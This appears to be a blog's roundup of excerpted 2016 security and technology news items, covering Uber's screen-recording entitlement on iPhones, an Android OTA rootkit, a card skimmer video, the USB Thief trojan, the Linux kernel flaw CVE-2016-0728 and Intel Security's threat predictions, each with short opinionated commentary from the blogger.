Apple Allows Uber to Use a Powerful Feature that Lets it Record iPhone Screen

What could possibly go wrong when your privacy and phone are given “selectively” without your knowledge or ability to intervene?  What happens when Uber is hijacked?  Or Uber uses this access unscrupulously?

Security researcher Will Strafach recently revealed that Apple selectively grants Uber a powerful ability (what’s known as an “entitlement”) to use the newly introduced screen-recording API, with the intent of improving the performance of the Uber app on Apple Watch.

The screen-recording API allows the Uber app to record the user’s screen information even when the app is closed, giving Uber access to all the personal information passing through an iPhone screen.

What’s more? The company’s access to such permission could make this data vulnerable to hackers if they are somehow able to hijack Uber’s software.

Read more…

Source: Apple Allows Uber to Use a Powerful Feature that Lets it Record iPhone Screen

Dangerous Rootkit found Pre-Installed on nearly 3 Million Android Phones

Luckily, not many US Android phones.  Just a matter of time before manufacturers install rootkits as a matter of course.

Nearly 3 Million Android devices worldwide are vulnerable to man-in-the-middle (MITM) attacks that could allow attackers to remotely execute arbitrary code with root privileges, turning over full control of the devices to hackers.

According to a new report from security rating firm BitSight, the issue is due to a vulnerability in the insecure implementation of the OTA (Over-the-Air) update mechanism used by certain low-cost Android devices, including BLU Studio G from US-based Best Buy.

Source: Dangerous Rootkit found Pre-Installed on nearly 3 Million Android Phones

Watch Video: How Hacker Installs a Credit Card Skimmer in 3 Seconds

Watching this video shows exactly how fast and simple it is for thieves to alter a credit card terminal, almost in full view.

So, be cautious when you use any ATM and always look carefully at the teller machine before using it. If you find that the machine has been tampered with, or if its card slot looks damaged or scratched, DO NOT use the ATM.

Card Skimmers have been around for years, but the video posted below is a perfect example of the evolution of the technology used by thieves.

The video released by Miami Beach Police involved two men who work as a team to install a credit card Skimmer on top of a card terminal at a local gas station in LESS THAN 3 SECONDS.

Yes, in just less than 3 seconds hackers can turn a regular credit and debit card reader into a Skimmer – a device designed to secretly steal a victim’s credit or debit card information.

The two men were caught on video by a security camera, but it all happened so fast that one might have to rewatch the video to actually catch the crime.

Read more…

Source: Watch Video: How Hacker Installs a Credit Card Skimmer in 3 Seconds

USB Thief — Self-projecting USB Trojan Is Here To Give You Nightmares

Rule of Thumb

Never, never, never use USB drives from an unknown source. This includes buying cheap USB drives from unknown sources on eBay! So many interesting things are being pre-loaded these days. Tell your uncle with the nude pics on the USB drive that you’ll pass. BTW, do we need to have a conversation about the objectification of women?…

Security researchers have identified a new malware named USB Thief that is able to steal data from air-gapped computers without leaving a trace.

Source: USB Thief — Self-projecting USB Trojan Is Here To Give You Nightmares

Kaspersky Researcher Shows How He Hacked His Hospital While Sitting In His Car – fossBytes

Please note that he noticed the potential security risks inherent in the hospital’s system and medical equipment and got permission to run tests to expose the vulnerabilities.

When we visit a hospital, we put our complete trust in our doctor and the medical equipment that he/she uses. With advancement in technology, this equipment has become more complex and interconnected. Sadly, ensuring standard cybersecurity measures is not a top priority of the medical professionals. This fact was recently outlined by a Kaspersky security researcher who hacked a hospital while sitting in his car.

Source: Kaspersky Researcher Shows How He Hacked His Hospital While Sitting In His Car – fossBytes

Uber tests out using smartphones to monitor driver behavior | Ars Technica

So, what could possibly go wrong? Is anyone else weirded out by this?

Uber announced today that it will monitor some of its drivers’ behavior for things like excessive speeding or distracted driving. Starting with a trial in Houston, the program will use Uber drivers’ own smartphones to provide data to the company.

The company will use a phone’s gyroscopes, accelerometers, and GPS to record whether drivers break speed limits or play with their phone while the vehicle is in motion. But in this trial, Uber will only access that data if a customer has a complaint about driving standards.

Always-on monitoring of driving standards may come later, according to Uber Chief Security Officer Joe Sullivan. For now, the initiative is about being able to fact-check complaints and keep the company’s rating system on the rails.

Distracted driving is a and it’s responsible for much of the push toward self-driving cars in the US. As companies like Zendrive have shown, the sensors in smartphones today are very capable of assessing whether a phone is being used while traveling in a car.

Source: Uber tests out using smartphones to monitor driver behavior | Ars Technica

Zero-Day Flaw Found In ‘Linux Kernel’ Leaves Millions Vulnerable

A new critical zero-day vulnerability has been discovered in the Linux kernel that could allow attackers to gain root level privileges by running a malicious Android or Linux application on an affected device.

The critical Linux kernel flaw (CVE-2016-0728) has been identified by a group of researchers at a startup named Perception Point.

The vulnerability was present in the code since 2012, and affects any operating system with Linux kernel 3.8 and higher, so there are probably tens of millions of computers, both 32-bit and 64-bit, exposed to this flaw.

However, the most bothersome part is that the problem affects Android versions KitKat and higher, which means about 66 percent of all Android devices are also exposed to the serious Linux kernel flaw.

Impact of the Zero-Day Vulnerability

An attacker would only require local access to exploit the flaw on a Linux server.

If successfully exploited, the vulnerability can allow attackers to get root access to the operating system, enabling them to delete files, view private information, and install malicious apps.

“It’s pretty bad because a user with legitimate or lower privileges can gain root access and compromise the whole machine,” Yevgeny Pats, co-founder and CEO at security vendor Perception Point, said in a blog post published today.

“With no auto update for the kernel, these versions could be vulnerable for a long time. Every Linux server needs to be patched as soon as the patch is out.”

Usually, flaws in the Linux kernel are patched as soon as they are found; therefore, Linux-based operating systems are considered to be more secure than others. However, the zero-day vulnerability recently discovered in the Linux kernel persisted for almost 3 years.

Read the rest of the article…

Source: Zero-Day Flaw Found In ‘Linux Kernel’ Leaves Millions Vulnerable | The Hacker News

First Click: The quietest story of CES is also the biggest | The Verge

What happens to humans when all things move like information?

Are we prepared to play this out without setting any groundwork and without mitigating and reducing the consequences of an all-automated society?

So what happens when the robots reduce the cost and time of moving physical objects to not a lot and pretty fast? When a huge variety of autonomous vehicles in every shape and size from tiny drone to semi truck can be sent off to deliver things without having to slow down or take naps or feel inconvenienced? What does an already globalized culture look like when it’s not just information that can travel instantly, but actual things that can spread across the city and state and world faster and cheaper than ever?

We already know some answers: software-driven advances in logistics and warehousing are behind seemingly-simple things like Amazon’s ultrafast shipping, and services like Instacart and Uber have taught users to expect real-world results from pushing a smartphone button — even if they’re filling in the gaps with other humans for now. The goal is to automate everything, and the first step is teaching the machines to move around.

The machines are fast learners, it turns out. What happens when they have nothing left to learn?

Source: First Click: The quietest story of CES is also the biggest | The Verge

Get A Glimpse Of The Cyber Threat Landscape For 2016 And Beyond | Hacked

Here’s a rundown of the cyber threat landscape for 2016 and beyond, courtesy of a report from Intel Security.

Coming In 2016

The 2016 predictions cover threats from ransomware, infrastructure attacks, attacks on automobile systems and the sale and warehousing of stolen data.

• Hardware: Attacks on hardware and firmware will continue while the market for the tools that facilitate them will increase. System firmware toolkits could target virtual machines.

• Ransomware: Ransomware is a growing threat that could anonymize payment methods and networks. More inexperienced cybercriminals will use ransomware-as-a-service.

• Wearables: Most wearable devices store only small amounts of information, but cybercriminals could target them to undermine the smartphones that manage them. The industry will have to protect attack surfaces like networking and wi-fi software, operating system kernels, memory, user interfaces, storage systems and local files, web apps, virtual machines and security and access control software.

• Employee systems: Attackers are likely to target organizations through their employees, including their home security systems, to access corporate networks. Organizations will have to stay vigilant by implementing new security technologies, creating effective policies and hiring experienced people.

• Cloud services: Attackers could exploit vulnerable security policies that protect cloud services. These services could undermine business strategy, financials, portfolio strategies, next-generation innovations, employee data, acquisition and divestiture plans, and other data.

• Automobiles: Connected automobile systems that lack security capabilities will be potential scenarios for exploitation. Automakers and IT vendors will partner to provide standards and solutions to protect attack surfaces like engine and transmission engine control units (ECUs), remote key systems, advanced driver assistance system ECUs, passive keyless entry, USBs, OBD IIs, V2X receiver, smartphone access and remote link type apps.

• Warehouses of stolen data: The dark market for stolen, personally-identifiable information and user names and passwords will increase in 2016. Big data warehouses that link together stolen, personally-identifiable information sets make combined records more valuable to attackers.

• Integrity attacks: Selective compromises to systems and data mark one of the most significant new attack vectors. Such attacks seize and modify transactions or data to favor perpetrators. An attacker can change direct deposit settings for a victim’s paychecks and direct the deposit to a different account. Cyber thieves could steal millions of dollars in an integrity attack in the financial sector in 2016, McAfee Labs predicts.

• Sharing threat intelligence: Enterprises and security vendors will increasingly share intelligence. Legislative action could allow governments and companies to share threat intelligence. Best practices in this area will increase, allowing success metrics to emerge and quantify protection improvement. Threat intelligence cooperatives among vendors will grow.

Source: Get A Glimpse Of The Cyber Threat Landscape For 2016 And Beyond | Hacked